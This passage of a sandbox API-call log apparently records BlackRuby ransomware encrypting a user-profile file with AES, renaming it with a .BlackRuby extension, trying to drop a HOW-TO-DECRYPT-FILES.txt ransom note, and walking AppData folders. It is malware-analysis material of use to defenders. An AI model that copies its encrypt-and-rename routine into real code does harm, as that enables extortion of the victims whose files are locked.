lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG", nBufferLength=0x105, lpBuffer=0x18e894, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\NTUSER.DAT.LOG", lpFilePart=0x0) returned 0x1f [0048.381] GetLastError () returned 0x0 [0048.381] SetErrorMode (uMode=0x1) returned 0x0 [0048.381] CreateFileW (lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG" (normalized: "c:\\users\\default\\ntuser.dat.log"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0048.381] GetLastError () returned 0x0 [0048.381] GetFileType (hFile=0x184) returned 0x1 [0048.381] SetErrorMode (uMode=0x0) returned 0x1 [0048.382] GetFileType (hFile=0x184) returned 0x1 [0048.382] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ee48 | out: lpFileSizeHigh=0x18ee48*=0x0) returned 0x400 [0048.382] GetLastError () returned 0x0 [0048.382] ReadFile (in: hFile=0x184, lpBuffer=0x1b419c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18edf0, lpOverlapped=0x0 | out: lpBuffer=0x1b419c4*, lpNumberOfBytesRead=0x18edf0*=0x400, lpOverlapped=0x0) returned 1 [0048.389] GetLastError () returned 0x0 [0048.389] CloseHandle (hObject=0x184) returned 1 [0048.389] GetLastError () returned 0x0 [0048.389] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG", nBufferLength=0x105, lpBuffer=0x18e9a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\NTUSER.DAT.LOG", lpFilePart=0x0) returned 0x1f [0048.389] GetLastError () returned 0x0 [0048.389] SetErrorMode (uMode=0x1) returned 0x0 [0048.389] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG" (normalized: "c:\\users\\default\\ntuser.dat.log"), fInfoLevelId=0x0, lpFileInformation=0x18ee58 | out: lpFileInformation=0x18ee58*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x4c6063a4, ftCreationTime.dwHighDateTime=0x1ca0453, ftLastAccessTime.dwLowDateTime=0x82363a0a, ftLastAccessTime.dwHighDateTime=0x1ca0458, ftLastWriteTime.dwLowDateTime=0x82389c62, ftLastWriteTime.dwHighDateTime=0x1ca0458, nFileSizeHigh=0x0, nFileSizeLow=0x400)) returned 1 [0048.389] GetLastError () returned 0x0 [0048.389] SetErrorMode (uMode=0x0) returned 0x1 [0048.389] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG", nBufferLength=0x105, lpBuffer=0x18e9c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\NTUSER.DAT.LOG", lpFilePart=0x0) returned 0x1f [0048.389] GetLastError () returned 0x0 [0048.389] SetFileAttributesW (lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG", dwFileAttributes=0x20) returned 1 [0048.389] GetLastError () returned 0x0 [0048.389] CryptAcquireContextW (in: phProv=0x18edb8, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18edb8*=0x37c708) returned 1 [0048.390] GetLastError () returned 0x0 [0048.423] CryptImportKey (in: hProv=0x37c708, pbData=0x1b9d29c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed94 | out: phKey=0x18ed94*=0x360f60) returned 1 [0048.423] GetLastError () returned 0x0 [0048.423] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0048.423] GetLastError () returned 0x0 [0048.428] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0048.428] GetLastError () returned 0x0 [0048.428] CryptDuplicateKey (in: hKey=0x360f60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ed50 | out: phKey=0x18ed50*=0x360b60) returned 1 [0048.428] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0048.428] GetLastError () returned 0x0 [0048.428] CryptSetKeyParam (hKey=0x360b60, dwParam=0x4, pbData=0x1bca2e8*=0x1, dwFlags=0x0) returned 1 [0048.428] GetLastError () returned 0x0 [0048.428] CryptSetKeyParam (hKey=0x360b60, dwParam=0x1, pbData=0x1bca2b4, dwFlags=0x0) returned 1 [0048.428] GetLastError () returned 0x0 [0048.428] CryptEncrypt (in: hKey=0x360b60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bca330*, pdwDataLen=0x18ede0*=0x500, dwBufLen=0x500 | out: pbData=0x1bca330*, pdwDataLen=0x18ede0*=0x500) returned 1 [0048.428] GetLastError () returned 0x0 [0048.428] CryptEncrypt (in: hKey=0x360b60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bcad5c*, pdwDataLen=0x18edf8*=0x10, dwBufLen=0x10 | out: pbData=0x1bcad5c*, pdwDataLen=0x18edf8*=0x10) returned 1 [0048.428] GetLastError () returned 0x0 [0048.428] CryptEncrypt (in: hKey=0x360b60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1bcad8c*, pdwDataLen=0x18ee00*=0x0, dwBufLen=0x10 | out: pbData=0x1bcad8c*, pdwDataLen=0x18ee00*=0x10) returned 1 [0048.428] GetLastError () returned 0x0 [0048.428] CryptDestroyKey (hKey=0x360f60) returned 1 [0048.428] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0048.428] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0048.428] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG", nBufferLength=0x105, lpBuffer=0x18e89c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\NTUSER.DAT.LOG", lpFilePart=0x0) returned 0x1f [0048.428] GetLastError () returned 0x0 [0048.428] SetErrorMode (uMode=0x1) returned 0x0 [0048.429] CreateFileW (lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG" (normalized: "c:\\users\\default\\ntuser.dat.log"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0048.429] GetLastError () returned 0xb7 [0048.429] GetFileType (hFile=0x184) returned 0x1 [0048.429] SetErrorMode (uMode=0x0) returned 0x1 [0048.429] GetFileType (hFile=0x184) returned 0x1 [0048.431] CloseHandle (hObject=0x184) returned 1 [0048.431] GetLastError () returned 0xb7 [0048.431] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG", nBufferLength=0x105, lpBuffer=0x18e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\NTUSER.DAT.LOG", lpFilePart=0x0) returned 0x1f [0048.431] GetLastError () returned 0xb7 [0048.431] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Encrypted_9J1iTs3LXGfFWQPCv36MMxUKTbIV4g1L2afYC1hmycebw.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Encrypted_9J1iTs3LXGfFWQPCv36MMxUKTbIV4g1L2afYC1hmycebw.BlackRuby", lpFilePart=0x0) returned 0x52 [0048.431] GetLastError () returned 0xb7 [0048.431] SetErrorMode (uMode=0x1) returned 0x0 [0048.431] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG" (normalized: "c:\\users\\default\\ntuser.dat.log"), fInfoLevelId=0x0, lpFileInformation=0x18ee40 | out: lpFileInformation=0x18ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c6063a4, ftCreationTime.dwHighDateTime=0x1ca0453, ftLastAccessTime.dwLowDateTime=0x82363a0a, ftLastAccessTime.dwHighDateTime=0x1ca0458, ftLastWriteTime.dwLowDateTime=0x25123ec0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x510)) returned 1 [0048.431] GetLastError () returned 0xb7 [0048.431] SetErrorMode (uMode=0x0) returned 0x1 [0048.431] MoveFileW (lpExistingFileName="C:\\Users\\Default\\NTUSER.DAT.LOG" (normalized: "c:\\users\\default\\ntuser.dat.log"), lpNewFileName="C:\\Users\\Default\\Encrypted_9J1iTs3LXGfFWQPCv36MMxUKTbIV4g1L2afYC1hmycebw.BlackRuby" (normalized: "c:\\users\\default\\encrypted_9j1its3lxgffwqpcv36mmxuktbiv4g1l2afyc1hmycebw.blackruby")) returned 1 [0048.432] GetLastError () returned 0xb7 [0048.432] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x29 [0048.432] GetLastError () returned 0xb7 [0048.432] SetErrorMode (uMode=0x1) returned 0x0 [0048.432] CreateFileW (lpFileName="C:\\Users\\Default\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0048.432] GetLastError () returned 0x5 [0048.433] SetErrorMode (uMode=0x0) returned 0x1 [0048.433] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG1", nBufferLength=0x105, lpBuffer=0x18e9f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\NTUSER.DAT.LOG1", lpFilePart=0x0) returned 0x20 [0048.433] GetLastError () returned 0x5 [0048.433] SetErrorMode (uMode=0x1) returned 0x0 [0048.433] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG1" (normalized: "c:\\users\\default\\ntuser.dat.log1"), fInfoLevelId=0x0, lpFileInformation=0x1be9d2c | out: lpFileInformation=0x1be9d2c*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x4ef6cd7a, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x4ef6cd7a, ftLastAccessTime.dwHighDateTime=0x1ca0427, ftLastWriteTime.dwLowDateTime=0xe862a960, ftLastWriteTime.dwHighDateTime=0x1d2f581, nFileSizeHigh=0x0, nFileSizeLow=0x30400)) returned 1 [0048.433] GetLastError () returned 0x5 [0048.433] SetErrorMode (uMode=0x0) returned 0x1 [0048.434] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x29 [0048.434] GetLastError () returned 0x5 [0048.434] SetErrorMode (uMode=0x1) returned 0x0 [0048.434] CreateFileW (lpFileName="C:\\Users\\Default\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0048.434] GetLastError () returned 0x5 [0048.435] SetErrorMode (uMode=0x0) returned 0x1 [0048.435] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG2", nBufferLength=0x105, lpBuffer=0x18e9f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\NTUSER.DAT.LOG2", lpFilePart=0x0) returned 0x20 [0048.435] GetLastError () returned 0x5 [0048.435] SetErrorMode (uMode=0x1) returned 0x0 [0048.435] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG2" (normalized: "c:\\users\\default\\ntuser.dat.log2"), fInfoLevelId=0x0, lpFileInformation=0x1c0782c | out: lpFileInformation=0x1c0782c*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x4ef6cd7a, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x4ef6cd7a, ftLastAccessTime.dwHighDateTime=0x1ca0427, ftLastWriteTime.dwLowDateTime=0x4ef6cd7a, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0048.435] GetLastError () returned 0x5 [0048.435] SetErrorMode (uMode=0x0) returned 0x1 [0048.436] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x29 [0048.436] GetLastError () returned 0x5 [0048.436] SetErrorMode (uMode=0x1) returned 0x0 [0048.436] CreateFileW (lpFileName="C:\\Users\\Default\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0048.436] GetLastError () returned 0x5 [0048.436] SetErrorMode (uMode=0x0) returned 0x1 [0048.437] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf", nBufferLength=0x105, lpBuffer=0x18e9f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf", lpFilePart=0x0) returned 0x48 [0048.437] GetLastError () returned 0x5 [0048.437] SetErrorMode (uMode=0x1) returned 0x0 [0048.437] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf" (normalized: "c:\\users\\default\\ntuser.dat{6cced2f1-6e01-11de-8bed-001e0bcd1824}.tm.blf"), fInfoLevelId=0x0, lpFileInformation=0x1c25318 | out: lpFileInformation=0x1c25318*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5bbcea65, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0x5bbcea65, ftLastAccessTime.dwHighDateTime=0x1ca043c, ftLastWriteTime.dwLowDateTime=0x5bfd2f8c, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x10000)) returned 1 [0048.437] GetLastError () returned 0x5 [0048.437] SetErrorMode (uMode=0x0) returned 0x1 [0048.437] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x29 [0048.437] GetLastError () returned 0x5 [0048.437] SetErrorMode (uMode=0x1) returned 0x0 [0048.437] CreateFileW (lpFileName="C:\\Users\\Default\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0048.438] GetLastError () returned 0x5 [0048.438] SetErrorMode (uMode=0x0) returned 0x1 [0048.438] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms", nBufferLength=0x105, lpBuffer=0x18e9f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms", lpFilePart=0x0) returned 0x6d [0048.438] GetLastError () returned 0x5 [0048.438] SetErrorMode (uMode=0x1) returned 0x0 [0048.438] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{6cced2f1-6e01-11de-8bed-001e0bcd1824}.tmcontainer00000000000000000001.regtrans-ms"), fInfoLevelId=0x0, lpFileInformation=0x1c42f08 | out: lpFileInformation=0x1c42f08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5bc8d146, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0x5bc8d146, ftLastAccessTime.dwHighDateTime=0x1ca043c, ftLastWriteTime.dwLowDateTime=0x5bface2c, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0048.439] GetLastError () returned 0x5 [0048.439] SetErrorMode (uMode=0x0) returned 0x1 [0048.439] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x29 [0048.439] GetLastError () returned 0x5 [0048.439] SetErrorMode (uMode=0x1) returned 0x0 [0048.439] CreateFileW (lpFileName="C:\\Users\\Default\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0048.439] GetLastError () returned 0x5 [0048.440] SetErrorMode (uMode=0x0) returned 0x1 [0048.440] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms", nBufferLength=0x105, lpBuffer=0x18e9f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms", lpFilePart=0x0) returned 0x6d [0048.440] GetLastError () returned 0x5 [0048.440] SetErrorMode (uMode=0x1) returned 0x0 [0048.440] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{6cced2f1-6e01-11de-8bed-001e0bcd1824}.tmcontainer00000000000000000002.regtrans-ms"), fInfoLevelId=0x0, lpFileInformation=0x1c60bf8 | out: lpFileInformation=0x1c60bf8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5bd71988, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0x5bd71988, ftLastAccessTime.dwHighDateTime=0x1ca043c, ftLastWriteTime.dwLowDateTime=0x5bfd2f8c, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0048.440] GetLastError () returned 0x5 [0048.440] SetErrorMode (uMode=0x0) returned 0x1 [0048.441] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x29 [0048.441] GetLastError () returned 0x5 [0048.441] SetErrorMode (uMode=0x1) returned 0x0 [0048.441] CreateFileW (lpFileName="C:\\Users\\Default\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0048.441] GetLastError () returned 0x5 [0048.442] SetErrorMode (uMode=0x0) returned 0x1 [0048.442] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\ntuser.ini", nBufferLength=0x105, lpBuffer=0x18e9f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\ntuser.ini", lpFilePart=0x0) returned 0x1b [0048.442] GetLastError () returned 0x5 [0048.442] SetErrorMode (uMode=0x1) returned 0x0 [0048.442] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\ntuser.ini" (normalized: "c:\\users\\default\\ntuser.ini"), fInfoLevelId=0x0, lpFileInformation=0x1c7e8e8 | out: lpFileInformation=0x1c7e8e8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x6baa150, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6baa150, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x19e18206, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x14)) returned 1 [0048.443] GetLastError () returned 0x5 [0048.443] SetErrorMode (uMode=0x0) returned 0x1 [0048.443] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x29 [0048.443] GetLastError () returned 0x5 [0048.443] SetErrorMode (uMode=0x1) returned 0x0 [0048.443] CreateFileW (lpFileName="C:\\Users\\Default\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0048.443] GetLastError () returned 0x5 [0048.444] SetErrorMode (uMode=0x0) returned 0x1 [0048.444] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData", lpFilePart=0x0) returned 0x18 [0048.444] GetLastError () returned 0x5 [0048.444] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.444] GetLastError () returned 0x5 [0048.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0048.444] GetLastError () returned 0x5 [0048.444] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData", lpFilePart=0x0) returned 0x18 [0048.445] GetLastError () returned 0x5 [0048.445] SetErrorMode (uMode=0x1) returned 0x0 [0048.445] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0048.445] GetLastError () returned 0x5 [0048.445] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.445] GetLastError () returned 0x5 [0048.445] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.445] GetLastError () returned 0x5 [0048.445] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.445] GetLastError () returned 0x5 [0048.445] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.445] GetLastError () returned 0x5 [0048.445] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.445] GetLastError () returned 0x12 [0048.445] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0048.445] SetErrorMode (uMode=0x0) returned 0x1 [0048.445] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData", lpFilePart=0x0) returned 0x18 [0048.445] GetLastError () returned 0x12 [0048.445] SetErrorMode (uMode=0x1) returned 0x0 [0048.445] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0048.445] GetLastError () returned 0x12 [0048.445] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.445] GetLastError () returned 0x12 [0048.445] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.445] GetLastError () returned 0x12 [0048.445] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.445] GetLastError () returned 0x12 [0048.445] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.445] GetLastError () returned 0x12 [0048.446] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.446] GetLastError () returned 0x12 [0048.446] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0048.446] SetErrorMode (uMode=0x0) returned 0x1 [0048.446] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x18e994, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local", lpFilePart=0x0) returned 0x1e [0048.446] GetLastError () returned 0x12 [0048.446] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.446] GetLastError () returned 0x12 [0048.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e8b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0048.446] GetLastError () returned 0x12 [0048.446] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local", lpFilePart=0x0) returned 0x1e [0048.446] GetLastError () returned 0x12 [0048.446] SetErrorMode (uMode=0x1) returned 0x0 [0048.446] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0048.447] GetLastError () returned 0x12 [0048.447] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.447] GetLastError () returned 0x12 [0048.447] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.447] GetLastError () returned 0x12 [0048.447] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.447] GetLastError () returned 0x12 [0048.447] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.447] GetLastError () returned 0x12 [0048.447] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.447] GetLastError () returned 0x12 [0048.447] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.447] GetLastError () returned 0x12 [0048.447] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.447] GetLastError () returned 0x12 [0048.447] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.447] GetLastError () returned 0x12 [0048.447] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0048.448] SetErrorMode (uMode=0x0) returned 0x1 [0048.448] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local", lpFilePart=0x0) returned 0x1e [0048.448] GetLastError () returned 0x12 [0048.448] SetErrorMode (uMode=0x1) returned 0x0 [0048.448] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0048.449] GetLastError () returned 0x12 [0048.449] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.449] GetLastError () returned 0x12 [0048.449] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.449] GetLastError () returned 0x12 